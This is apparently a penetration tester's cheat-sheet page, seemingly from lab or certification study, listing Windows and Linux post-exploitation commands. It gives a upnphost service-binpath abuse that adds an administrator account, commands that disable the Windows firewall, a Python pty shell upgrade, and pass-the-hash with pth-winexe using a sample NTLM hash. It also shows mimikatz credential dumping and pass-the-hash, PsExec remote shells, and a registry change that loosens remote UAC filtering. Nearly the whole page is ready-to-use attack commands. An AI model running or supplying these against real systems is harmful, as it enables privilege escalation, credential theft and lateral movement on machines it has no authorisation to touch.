keepnote
file transfer;
Winpriv check:
Local Privilege Escalation Abusing Misconfiguration Service (upnphost):
accesschk.exe -uwcqv "Authenticated Users" /accepteula accesschk-xp.exe -uwcqv "Authenticated Users" /accepteulaaccesschk.exe -ucqv upnphost sc config upnphost depend= "" sc config upnphost binpath= "net user testxlab Password1 /add" sc config upnphost binpath= "net localgroup Administrators testxlab /add"sc stop upnphost sc start upnphost
File Transfer via FTP
ftp > binary
ftp> put /root/Downloads/accesschk.exe accesschk.exe
Python Interactive Shell
pty spawn python3 -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
Disable Windows firewall on newer versions:
NetSh Advfirewall set allprofiles state offDisable windows firewall on older windows:
netsh firewall set opmode disable
Referans
priv esc linux - hacking articler (abuse path variable.) https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/ https://www.siberportal.org/red-team/linux-penetration-tests/linux-sizma-testlerinde-hak-yukseltme-yontemleri/
priv esc - windows - servisler - sc https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
pth-winexe -U alice%aad3b435b51404eeaad3b435b51404ee:B74242F37E47371AFF835A6EBCAC4FFE //10.11.1.49 cmd.exe
- PtH get user ntlm hash. (via RDP, MSF or other)
mimikatz# privilege::debug
mimikatz# privilege::minidump FILE.DMP
mimikatz# sekurlsa::logonpasswords
mimikatz# sekurlsa::pth /user:{USERNAME} /domain:{WORKGROUP or DOMAIN} /ntlm:{NTLM-HASH}
then open new cmd. you can run command via psexec.
windows> PsExec.exe \\{IP} cmdTip: General usage with password:
PsExec.exe \\{IP} -u {DOMAIN\USERNAME} -p {PASSWORD} cmdif got "Couldn't access otherComputer: Access is denied." ERROR:
run the following command at target system:
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
Last modified 1yr ago